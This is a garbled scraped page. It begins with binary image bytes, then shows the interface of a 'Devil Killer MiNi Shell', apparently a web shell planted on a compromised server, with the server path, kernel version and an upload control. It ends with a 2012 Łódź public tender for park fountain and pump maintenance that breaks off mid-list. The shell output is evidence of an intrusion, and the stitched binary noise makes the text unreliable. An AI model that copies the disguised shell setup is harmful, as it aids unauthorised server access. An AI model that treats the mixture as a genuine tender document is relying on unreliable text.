JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120224/44493-N-2012.html

<p class="kh_header"><b>Łódź: Utrzymanie fontann i pomp na terenach parków i skwerów w Łodzi w 2012 roku</b><br>
<b>Numer ogłoszenia: 44493 - 2012; data zamieszczenia: 24.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łódź, Oddział ds. Usług w Wydziale Zamówień Publicznych w Departamencie Obsługi i Administracji Urzędu Miasta Łodzi , ul. ks. I.J. Skorupki 21, 90-532 Łódź, woj. łódzkie, tel. 42 638 48 88, faks 42 638 48 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uml.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie fontann i pomp na terenach parków i skwerów w Łodzi w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie w należytym stanie technicznym fontann i pomp działających w okresie letnim na terenie parków i skwerów w Łodzi w 2012 r.
Szczegółowe zakresy prac są określone w poszczególnych częściach zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub wykonuje co najmniej 2 usługi w zakresie obsługi i konserwacji instalacji elektrycznej i wodno - kanalizacyjnej związanych z funkcjonowaniem fontann, zraszaczy, zbiorników wodnych, studni głębinowych o łącznej wartości minimum brutto:
- dla części 1 zamówienia -  40 000 PLN,
- dla części 2 zamówienia -  3 500 PLN,
- dla części 3 zamówienia - 25 000 PLN,
- dla części 4 zamówienia - 30 000 PLN,
- dla części 5 zamówienia -  50 000 PLN,
Uwaga:
1.W przypadku usług nadal wykonywanych należy podać wartość zrealizowanej usługi do dnia składania ofert.
2.Zamawiający nie dopuszcza, na potwierdzenie spełnienia ww. warunku, wykazania wykonanych przez Wykonawcę robót budowlanych tj. przebudowy, remontu i modernizacji instalacji i urządzeń energetycznych oraz wodno - kanalizacyjnych.
3. Jeżeli Wykonawca składa ofertę na więcej niż jedną część zamówienia, winien wykazać się na potwierdzenie spełnienia ww. warunku doświadczeniem o najwyższej wymaganej wartości tj.  wykonaniem lub wykonywaniem  co najmniej 2 usług w ww. zakresie o łącznej wartości co najmniej 50 000 PLN brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać dysponowanie co najmniej:
a) jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,
b) jedną osobą posiadającą kwalifikacje do eksploatacji urządzeń instalacji i sieci energetycznych zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. (Dz. U. z 2003 r., Nr 89, poz. 828 ze zm.) lub jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
c) jedną osobę z dyplomem inżyniera lub technika elektronika (wymóg tylko do części 1). 
Uwaga:
Uprawnienia budowlane, o których mowa wyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 27 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578 ze zm.)
Dopuszcza się uprawnienia równoważne - dla osoby, która posiada uzyskane przed dniem wejścia ustawy z dnia 7 lipca 1994 r. Prawo budowlane, uprawnienia lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowała uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12 ustawy z dnia 12 lipca 1994 r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008 r. Nr 63, poz. 394 ze zm.)
Wykonawca winien wykazać dysponowanie osobami wskazanymi w pkt 9.1.4 bez względu na ile części składa ofertę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o którym mowa w pkt III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio dla miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.bip.uml.lodz.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Łodzi, Departament Obsługi i Administracji, Wydział Zamówień Publicznych, 90-532 Łódź, ul. ks. I. Skorupki 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 08:45, miejsce: Urząd Miasta Łodzi, Departament Obsługi i Administracji, Wydział Zamówień Publicznych, 90-532 Łódź,  ul. ks. I. Skorupki 21, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający nie przewiduje zawarcia umowy ramowej ani ustanowić dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Obsługa i konserwacja fontann w parkach i skwerach na terenie Śródmieścia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa fontann w parkach i na skwerach w niżej określonym zakresie:
 1) Skwer Powstania Węgierskiego 1956 r.
Podstawowy zakres prac:
- odbiór i transport pomp z Leśnictwa Miejskiego w Łodzi przy ul. Łagiewnickiej 305
- montaż pomp ,
- utrzymanie fontanny w ruchu ciągłym (7 dni w tygodniu),
- kontrola działania fontanny 2 razy dziennie w godzinach rannych i popołudniowych,
- oczyszczanie misy, lustra wody oraz utrzymanie czystości wokół fontanny,
- oczyszczanie odpływów, filtrów,
- udrażnianie dysz,
- wymiana uszczelek i bezpieczników,
- zmywanie dna misy oraz wymiana wody (w razie potrzeby),
- odczytywanie wskazań liczników 1 raz w miesiącu i przekazywanie informacji na piśmie do Wydziału Ochrony Środowiska i Rolnictwa w Departamencie Infrastruktury i Lokali UMŁ,
- przygotowanie urządzeń fontanny  na czas zimowy,
- demontaż pomp w terminie do 31 października 2012 r. i dostarczenie do siedziby Wydziału Ochrony Środowiska i Rolnictwa  UMŁ  ul. Tymienieckiego 5 lub inne miejsce wskazane przez Zamawiającego (zdemontowane, zakonserwowane pompy winny zostać dostarczone przez Wykonawcę w dobrym stanie technicznym, umożliwiającym ich ponowne użytkowanie przez Zamawiającego),
-bieżąca konserwacja urządzeń elektrycznych, mechanicznych, wodociągowych oraz urządzeń pompowni,
- każdorazowe zgłaszanie Zamawiającemu uszkodzeń i awarii fontanny,
- przyjmowanie zgłoszeń od Zamawiającego o wystąpieniu awarii,
- usuwanie awarii w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu,
-zapewnienie całodobowego kontaktu telefonicznego we wszystkie dni tygodnia w sytuacjach awaryjnych i gotowości do szybkiego usunięcia awarii,
- wymiana przepalonych żarników lamp i projektorów,
- demontaż i montaż pokryw (rozpoczęcie i zakończenie sezonu),
- pomiar oporności izolacji instalacji i ochrony przeciwporażeniowej (rozpoczęcie sezonu),
- konserwacja i czyszczenie lamp, projektorów, obudów, gniazd i rozdzielni, nastawa zabezpieczeń i czujników (rozpoczęcie sezonu).
 2) Pasaż Rubinsteina
Podstawowy zakres prac:
- odbiór i transport pompy z Leśnictwa Miejskiego w Łodzi przy ul. Łagiewnickiej 305
- montaż pompy ,
- utrzymanie fontanny w ruchu ciągłym (7 dni w tygodniu),
- kontrola działania fontanny 2 razy dziennie w godzinach  rannych i popołudniowych,
- oczyszczanie misy, lustra wody oraz utrzymanie czystości wokół fontanny,
- oczyszczanie odpływów, filtrów,
- udrażnianie dysz,
- wymiana uszczelek i bezpieczników,
- zmywanie dna misy oraz wymiana wody (w razie potrzeby),
- odczytywanie wskazań liczników 1 raz w miesiącu i przekazywanie informacji na piśmie do Wydziału Ochrony Środowiska i Rolnictwa UMŁ,
- przygotowanie urządzeń fontanny na czas zimowy,
- bieżąca konserwacja urządzeń elektrycznych, mechanicznych, wodociągowych oraz urządzeń pompowni,
- demontaż pompy w terminie do 31 października 2012 r. i dostarczenie do siedziby Wydziału Ochrony Środowiska i Rolnictwa  UMŁ  ul. Tymienieckiego 5 lub inne miejsce wskazane przez Zamawiającego (zdemontowana, zakonserwowana pompa winna zostać dostarczona przez Wykonawcę w dobrym stanie technicznym, umożliwiającym ich ponowne użytkowanie przez Zamawiającego),
-zapewnienie całodobowego kontaktu telefonicznego we wszystkie dni tygodnia w sytuacjach awaryjnych i gotowości do szybkiego usunięcia awarii. 
- każdorazowe zgłaszanie Zamawiającemu uszkodzeń i awarii fontanny, 
- przyjmowanie zgłoszeń od Zamawiającego o wystąpieniu awarii,
- usuwanie awarii w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu,
3) Park Sienkiewicza i Park Matejki
Podstawowy zakres prac:
- odbiór i transport pomp z Leśnictwa Miejskiego w Łodzi przy ul. Łagiewnickiej 305 
- montaż pomp,
- utrzymanie fontann w ruchu ciągłym (7 dni w tygodniu),
- kontrola działania fontann 2 razy dziennie w godzinach rannych i popołudniowych,
- oczyszczanie mis, lustra wody oraz utrzymanie czystości wokół fontann,
- oczyszczanie odpływów, filtrów,
- udrażnianie dysz,
- wymiana uszczelek i bezpieczników,
- zmywanie dna mis oraz wymiana wody (w razie potrzeby),
- odczytywanie wskazań liczników 1 raz w miesiącu i przekazywanie informacji na piśmie do Wydziału Ochrony Środowiska i Rolnictwa UMŁ,
- przygotowanie urządzeń fontann na czas zimowy,
- demontaż pomp w terminie do 31 października 2012 r. i dostarczenie do siedziby Wydziału Ochrony Środowiska i Rolnictwa  UMŁ  ul. Tymienieckiego 5 lub inne miejsce wskazane przez Zamawiającego (zdemontowane, zakonserwowane pompy winny zostać dostarczone przez Wykonawcę w dobrym stanie technicznym, umożliwiającym ich ponowne użytkowanie przez Zamawiającego),
-bieżąca konserwacja urządzeń elektrycznych, mechanicznych, wodociągowych oraz urządzeń pompowni,
- każdorazowe zgłaszanie Zamawiającemu uszkodzeń i awarii fontann,
- przyjmowanie zgłoszeń od Zamawiającego o wystąpieniu awarii,
-zapewnienie całodobowego kontaktu telefonicznego we wszystkie dni tygodnia w sytuacjach awaryjnych i gotowości do szybkiego usunięcia awarii,
- usuwanie awarii w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu.
Okres świadczenia usługi: 01.05.2012 - 31.10.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obsługa i konserwacja pomp zasilających stawy w parkach na terenie Polesia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa i konserwacja pomp zasilających stawy w parkach na terenie Polesia w niżej określonym zakresie:
1.Park im. Poniatowskiego  - jedna pompa.
2.Park im. Piłsudskiego - dwie pompy  
Podstawowy zakres prac:
-dokonywanie bieżących przeglądów i konserwacji pomp,
- kontrole i odczyty amperomierzy i manometrów,
-włączanie do ruchu celem zapewnienia prawidłowej pracy agregatów, co dwa tygodnie,
-włączanie pomp na polecenie Wydziału Ochrony Środowiska i Rolnictwa UMŁ,
-dozór pomieszczeń przepompowni w okresie opadów atmosferycznych oraz ochrona przed zalaniem,
-dozór nad właściwym zabezpieczeniem przyłączy energetycznych i ich konserwacja,
-bezzwłoczne informowanie Wydziału Ochrony Środowiska i Rolnictwa UMŁ o przypadkach dewastacji oraz awarii pomp (telefoniczne i pisemne),
-usuwanie awarii pomp w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu,
-składanie pisemnych sprawozdań z wykonanych prac zawierających informacje o stanie urządzeń,
-wykonywanie wszelkich napraw w celu prawidłowego funkcjonowania pomp,
Okres świadczenia usługi: 01.05.2012- 31.10.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Obsługa i konserwacja fontanny i sztucznego zbiornika wodnego w parku na terenie Bałut.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa i konserwacja fontann i sztucznego zbiornika w niżej określonym zakresie:
1.Park Staromiejski (fontanna)
Podstawowy zakres prac:
- zebranie i wywóz śmieci i gruzu z misy fontanny,
- oczyszczenie zbiornika pompowni i sterowni,
- mechaniczne oczyszczenie i udrożnienie odpływu i przelewu wody,
- oczyszczenie i udrożnienie studzienek,
- umycie ciśnieniowe elementów fontanny,
- sprawdzenie stanu technicznego elementów składowych obsługujących fontannę w tym: zawory, zasuwy, pompy, wentylator, przewody doprowadzające i odprowadzające powietrze, rury,
- uszczelnienie przewodów dopływu i odpływu wody,
- naprawa elementów wylotowych,
- uzupełnienie i dorobienie końcówek tryskaczy,
- uregulowanie pracy całości urządzeń i sformatowanie działania strumienia wody, 
- wymiana zamków do pomieszczenia sterowni,
- bieżący nadzór nad pracą urządzeń,
- ciągły dozór techniczny i codzienne usuwanie zanieczyszczeń typu liście, kwiatostany, śmieci z misy fontanny,
- czyszczenie misy fontanny, odkażanie instalacji wodnej,
- regulacja poziomu wody, czyszczenie studzienki wodomierzowej zaworowej,
-  naprawa tryskaczy i zaworów,
- regulacja poziomu wody, sprawdzenie instalacji elektrycznej, udrożnienie przewodów odpływowych, czyszczenie studni,
- wymiana wody,
- konserwacja aparatów sterujących pompowni, kontrola zbiornika retencyjnego podczas pracy pomp,
- wymiana elementów tryskaczy,
- przechowywanie kluczy do pomieszczenia sterowni oraz stały dozór zamknięcia pomieszczeń  sterowni do czasu wyłonienia Wykonawcy obsługi fontanny w następnym sezonie.
- każdorazowe zgłaszanie Zamawiającemu uszkodzeń i awarii fontanny,
- przyjmowanie zgłoszeń od Zamawiającego o wystąpieniu awarii,
- usuwanie awarii w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu,
-zapewnienie całodobowego kontaktu telefonicznego we wszystkie dni tygodnia w sytuacjach awaryjnych i gotowości do szybkiego usunięcia awarii,
